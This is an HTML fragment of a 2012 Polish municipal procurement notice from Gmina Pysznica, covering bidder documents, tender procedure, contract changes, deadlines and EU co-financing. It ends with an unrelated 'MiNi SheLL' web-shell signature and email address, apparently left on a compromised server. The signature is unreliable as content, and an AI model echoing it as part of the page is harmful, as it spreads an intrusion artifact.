<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia: 
1) W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia dokumenty wymienione powyżej w pkt. III.4.2. i 4.3. składa każdy z Wykonawców oddzielnie. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę  lub wspólnie przez wszystkich członków konsorcjum; 
2) W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, do oferty musi być załączony dokument ustanawiający pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; 
3) W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy podpisują wszyscy członkowie konsorcjum  lub Pełnomocnik w imieniu całego konsorcjum,  a oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 ustawy podpisuje odrębnie każdy członek  Konsorcjum;
4) W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny, kadrowy oraz finansowy.  

2. Inne dokumenty: 
1) Wypełniony i podpisany formularz oferty - załącznik nr 1 do siwz; 
2) Podpisany wzór umowy przez upoważnionych przedstawicieli Wykonawcy - załącznik nr 6 do siwz; 
3) Pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji ich potencjału technicznego, kadrowego lub finansowego na okres korzystania z nich przy wykonywaniu zamówienia; 
4) W przypadku wykonywania części dostaw i usług przez podwykonawców należy załączyć wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z zakresem wykonywanych przez nich czynności; 
5) Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań. Musi być załączone w oryginale albo załączone jako kopia pełnomocnictwa uwierzytelniona notarialnie. 
6) Wobec Wobec Wykonawcy, będącego osobą fizyczną  zaleca się  dołączenie do oferty aktualnego wpisu w Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zakazana jest istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2.  Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy.
1) zmiana wysokości wynagrodzenia określonego w § 2 umowy w przypadku ustawowej zmiany wysokości stawki podatku od towarów i usług (VAT), 
1)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
b) działania siły wyższej, uniemożliwiającej wykonanie dostaw w określonym pierwotnie terminie.
3.  Zmiany umowy przewidziane w ust. 2. dopuszczalne są na następujących warunkach:
1) ad pkt 1) - w zakresie od wejścia w życie zmienionej stawki podatku od towarów i usług (VAT) i w zakresie zmiany tej stawki,
2) ad pkt 2):
    - lit. a) - w zakresie uzasadnionego interesu Zamawiającego,
    - lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania.
4. Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pysznica.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Pysznicy ul. Wolności 277, I piętro pok. nr 9

Siwz w wersji elektronicznej jest bezpłatna, za papierową wpłata 49,20 zł brutto na konto nr  63 9434 1025 2006 1695 1311 0001.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2012 godzina 10:00, miejsce: Urząd Gminy w Pysznicy ul. Wolności 277, I piętro pok. nr 5 ( sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie dofinansowane jest ze środków Unii Europejskiej w ramach osi IV Ochrona środowiska i zapobieganie zagrożeniom, Działanie 4.3 Zachowanie oraz ochrona różnorodności biologicznej i krajobrazowej, Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013.
2. Zamówienie ogłoszono w Biuletynie Zamówień Publicznych w dniu 29.06.2012 r. 
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. 
4. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
5. Zamawiający nie dopuszcza składania ofert równoważnych, nie przewiduje zawarcia umowy ramowej, ani ustanowienia dynamicznego systemu zakupów, nie jest przewidziany wybór najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej, o której mowa w art. 91a do art. 91c ustawy Pzp. 
6. Zamawiający nie przewiduje zwrotu kosztów udziału Wykonawców w postępowaniu.
7. Zamawiający nie przewiduje stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy Pzp..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com